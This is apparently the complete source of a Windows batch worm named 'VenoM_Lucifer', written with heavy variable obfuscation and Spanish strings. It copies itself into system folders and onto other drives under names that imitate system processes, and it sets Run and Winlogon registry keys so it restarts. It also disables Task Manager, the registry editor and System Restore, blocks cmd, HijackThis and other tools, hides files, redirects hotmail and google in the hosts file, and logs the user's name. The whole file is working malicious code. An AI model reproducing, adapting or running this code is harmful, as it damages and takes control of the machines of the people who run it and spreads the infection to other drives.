@shift ::________________________________:: :::: :: Nombre : 'VenoM_Lucifer' :: :: Autor : VenoM :: :: Version : 4.666 :: ::________________________________:: :::: if '%6==%6'~ goto !V-h_0H%6 sEt ``',=SeT %``',% ``'=gOto %``',% V-!=rem %``',% h_0=X %``',% _0H=x %``',% ``=seT if "%1"=="666" (%``',% v_!H=Set&%``'% !h_0hH) else (%``',% v_!H=Set&%``'% !V-h_0H%4) :!V-h_OHH attrib -s -h -r -a %0 if not e%cho% "%``%\%``'%.%_oH%" (c%all% %0 "%``%\%``'%.%_oH%") if not e%cho% "C:\%sht%NDOWS\%``'%.%_oH%" (c%all% %0 "C:\%sht%NDOWS\%``'%.%_oH%") if not e%cho% "%D:%\%``%\%`%.%h_o%" (c%all% %0 "%D:%\%``%\%`%.%h_o%") if not e%cho% "C:\%``%\%`%.%h_o%" (c%all% %0 "C:\%``%\%`%.%h_o%") c%all% %0 "%``%\system32\taskmgr.%_oH%" if not e%cho% "%``%\system32\drivers\etc\%_!H%.com" (c%all% %0 "%``%\system32\drivers\etc\%_!H%.com") if not e%cho% "%userprofile%\Config~1\Datosd~1\Microsoft\%sht%nlogon.scr" (c%all% %0 "%userprofile%\Config~1\Datosd~1\Microsoft\%sht%nlogon.scr") %v_!% H_Ohn :H_Ohn %`'% e%cho% "%c%\services.%_oH%" %v_!% _!v_!H_Ohn c%all% %0 "%c%\services.%_oH%" %v_!% _!v_!H_Ohn :v_!H_0h if e%cho% "%``%\system\COM%a%.DLL" (%v_!% !v_!H_Ohn) else (%v_!% !v_!H_0hn) :9!v_!H_0hn9 for %%h in (%YU%) do if e%cho% %%h:\*.* (if not e%cho% "%%h:\%d%\LucifeR.exe" %v_!% !V-!h-0Hn) for %%h in (%YU%) do if e%cho% %%h:\*.* (find /i "ShelL\OpeN\CommanD=%_!%\LucifeR.%_oH% 666" "%%h:\%ee%"&if errorlevel 1 %v_!% !V-!h-0Hn) ping 127.0.0.1 -n 2 %v_!% 9!v_!H_0hn9 :!v_!H_Oh %v_!% !v_!H_0h :!v_!H_0hn if not e%cho% "%c%\Microsoft\csrss.%_oH%" c%all% %0 "%c%\Microsoft\csrss.%_oH%" %!V-!% "HKCU\Software\Microsoft\%sht%ndows\CurrentVersion\Run" /v %_!!%plorer.%_oH% /t %rs% /d "%c%\Microsoft\csrss.%_oH%" /f :!v_!H_Ohn %!V-!% "HKLM\Software\Microsoft\%sht%ndows\CurrentVersion\Run" /v CTFMON.%h_o% /t %rs% /d "%``%\%``'%.%_oH%" /f %!V-!% "HKLM\SOFTWARE\Microsoft\%sht%ndows NT\CurrentVersion\%sht%nlogon" /v Shell /t %rs% /d "%_!!%plorer.%_oH% %D:%\%``%\%`%.%h_o%" /f %`'% %z%==1 %v_!% !!v_!H_0hn %`'% %0=="%D:%\%``%\%`%.%h_o%" (%v_!% !!v_!H_0hn) %`'% %ad_lm%==lm (%`'% %0=="%``%\%``'%.exe" goto ex) %v_!% Ohn!V :Ohn!V start "%c%\services.%_oH%" "%c%\services.%_oH%" start "%c%\winlogon.%_oH%" "%c%\winlogon.%_oH%" if %COMPUTERNAME%==VENOM goto ex %v_!% !!v_!H_0hn :!v_!H_Ohn %v_!H% Men=%userprofile%\Men Inicio\Programas\Accesorios c%all% %0 "%D:%\Docume~1\Default User\Men Inicio\Programas\Inicio\%sht%n.scr" c%all% %0 "%userprofile%\Datosd~1\Microsoft\Internet %_!!%plorer\Quick Launch\Mis documentos.%_oH%" c%all% %0 "%``%\notepad.%_oH%" c%all% %0 "%``%\system32\notepad.%_oH%" c%all% %0 "%p%\%sht%ndows NT\Accesorios\wordpad.%_oH%" %v_!H% "%Men%\Smbolo del sistema.lnk" %v_!H% "%Men%\Bloc de notas.lnk" %v_!H% "%Men%\%_!!%plorador de %sht%ndows.lnk" %v_!H% "%p%\Trend Micro\HijackThis\HijackThis.%_oH%" %v_!H% "%allusersprofile%\Men Inicio\Programas\Accesorios\Herramientas del sistema\Tareas programadas.lnk" c%all% %0 "%userprofile%\Datos de programa.%_oH%" c%all% %0 "%D:%\WINDOWS.%h_o%" c%all% %0 "%``%\system32\drivers\etc.%_oH%" c%all% %0 "%``%\system32.%_oH%" attrib +h +s %``% attrib +s +h "%``%\system32" attrib +s +h "%``%\notepad.%_oH%" attrib +s +h "%``%\system32\notepad.%_oH%" %v_!% !V!-0HN :!V-h_0H pushd C:\ cd %systemdrive%\ %``% %1= %``% '=md %``% `'=e %``% ``',=goto %``% `',=s %v_!H% a=%random% %``',% `' %``% `',=cd :`' %``% `',=e %``',% `' %``% `',=d :`' %v_!H% c=%appdata% %``% `'=t %``',% `' %``% `'=if :`' %``% `'=if %if% %`',%%`',%%`'% ``'=%`',%%`',%%`'% %v_!H% b=E,F,G,H,I,J,K,L,M,N %v_!H% YU=C,D,E,F,G,H,I,J,K,L,M %v_!H% D:=%systemdrive% %``% _!!=Ex %v_!H% W=SOFTWARE\Microsoft\windows\CurrentVersion %``% r=HKCU\%w%\Policies\Explorer\DisallowRun %`'% not '%[!_v]%==%0%1%3' (goto !_) else (%[!_v]%goto !%!_v%Hn) :!h_0hH for %%i in (C,D,E,F,G,H,I,J,K,L,M) do if "%cd%"=="%%i:\" %``',% U=%%i if %0=="%U%:\SystemVolumeInformation\LucifeR.exe" start /max explorer.exe %U%:\ if '%8==%VER%' (%``'% !V-h_0H%3&``',) else (%``'% !V-h_0H%4) %``',% v_!H=cOPy set ``',=for : %v_!H% sht=in %v_!H% sht=wi %_!% :: Quemate en el infierno te desea 'Lucifer'>"%``%\system\COM%a%.DLL" if e%cho% "%``%\system\COM%a%.DLL" (%``'% ad_lm=ad&%v_!% !v_!H_0hn) else (%``'% YU=D,E,F,G,H,I,J,K,L,M&%``'% ad_lm=lm) %v_!% !v_!H_0hn :!v_!H_0hn %`',%%`',%%`'% h_o=E%h_0%E sET _oH=e%_0H%e %`'% %0=="%c%\services.%_oH%" %v_!% !h-0H!!v_!H_0hn!V %`'% %0=="%c%\winlogon.%_oH%" %v_!% 9!v_!H_0hn9 %`'% %0=="%D:%\%``%\%`%.%h_o%" (%v_!% !V-h_OHH) %'% "%c%\Micro$oft" %k% Ad-Watch.%h_o% %_!% %date% %time% %username%>>"%c%\Micro$oft\desktop.log" attrib +s +h "%c%\Micro$oft\desktop.log" %v_!% !V-h_OHH :!!v_!H_0hn %`'% %y%==1 %``'% x=LM %`'% %y%==2 %``'% x=CU %!V-!% "HK%x%\%W%\Policies\System" /v DisableTaskMgr /t %rd% /d "1" /f %!V-!% "HK%x%\%W%\Policies\System" /v DisableRegistryTools /t %rd% /d "1" /f %`'% %z%==1 %v_!% !! %!V-!% "HK%x%\%W%\Policies\%_!!%plorer" /v NoFolderOptions /t %rd% /d "1" /f %!V-!% "HK%x%\%W%\Policies\%_!!%plorer" /v NoFind /t %rd% /d "1" /f %`'% %y%==1 %``'% y=2&%v_!% !!v_!H_0hn :!! %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v Hidden /t %rd% /d "2" /f %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v ShowSuperHidden /t %rd% /d "0" /f %`'% %z%==1 %v_!% !V-!h-0H!!v_!H_0hn!V-!h_0hH %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v HideFile%_!!%t /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v NoRecycleFiles /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v NoPropertiesMyComputer /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v DisallowRun /t %rd% /d "1" /f if %ad_lm%==lm (%v_!% !V-h_0HH_0h!V!-0HN) %v_!% hn!V-! :hn!V-! %!V-!% "HKLM\%W%\%_!!%plorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t %rd% /d "0" /f %!V-!% "HKLM\SOFTWARE\Policies\Microsoft\%sht%ndows NT\SystemRestore" /v DisableConfig /t %rd% /d "1" /f %!V-!% "HKLM\SOFTWARE\Policies\Microsoft\%sht%ndows NT\SystemRestore" /v DisableSR /t %rd% /d "1" /f %!V-!% "%r%" /v 1 /t %rs% /d "notepad.exe" /f %!V-!% "%r%" /v 2 /t %rs% /d "HijackThis.exe" /f %!V-!% "%r%" /v 3 /t %rs% /d "wordpad.exe" /f %!V-!% "%r%" /v 4 /t %rs% /d "rstrui.exe" /f %!V-!% "%r%" /v 5 /t %rs% /d "taskmgr.exe" /f %!V-!% "%r%" /v 5 /t %rs% /d "msconfig.exe" /f %!V-!% "%r%" /v 6 /t %rs% /d "regedit.exe" /f %!V-!% "%r%" /v 7 /t %rs% /d "HiJackThis_v2.exe" /f %!V-!% "%r%" /v 10 /t %rs% /d "cmd.exe" /f %!V-!% "%r%" /v 11 /t %rs% /d "ibprocman.exe" /f %!V-!% "%r%" /v 12 /t %rs% /d "explorer.exe" /f %!V-!% "%r%" /v 13 /t %rs% /d "integrator.exe.exe" /f find /i "metroflog" "%``%\system32\drivers\etc\hosts"&if errorlevel 1 for %%n in (metroflog,hotmail,google) do %_!% 127.0.0.1 www.%%n.com>>%``%\system32\drivers\etc\hosts %!V-!% "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t %rs% /d "www.google.com.mx" /f %v_!% !V-h_0HH_0h!V!-0HN :!V-h_0HH_0h!V!-0HN if not e%cho% "%userprofile%\Plantillas\Leviathan.hta" %v_!% _0h %v_!% _0hn :!V-h_0HH c%all% %0 "c:\%sht%ndows\taskmgr.%_oH%" c%all% %0 "c:\%sht%ndows\%``'%.%_oH%" if e%cho% "c:\%sht%ndows\all users\men inicio" (%v_!% !v_!H_0hn) else (%v_!% !v_!H_Ohn) :_0h set hp="%userprofile%\Plantillas\Leviathan.hta" %_!% ^^^^ >%hp% %_!% ^>%hp% %_!% SCROLLFLAT ="No" SingleInstance="No" ShowInTaskbar="No" SysMenu="No" MaximizeButton="No" MinimizeButton="No" >>%hp% %_!% Border="Thin" BORDERSTYLE ="normal" INNERBORDER ="No" Caption="No" WindowState="maximize"^> >>%hp% %_!% ^^ >>%hp% %_!% ^^^^^^^^^^^^^^ >>%hp% %_!% ^ >>%hp% %_!% ^^ >>%hp% %_!% ۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠^ >>%hp% %_!% ^^ >>%hp% %_!% ^ >>%hp% %_!% ^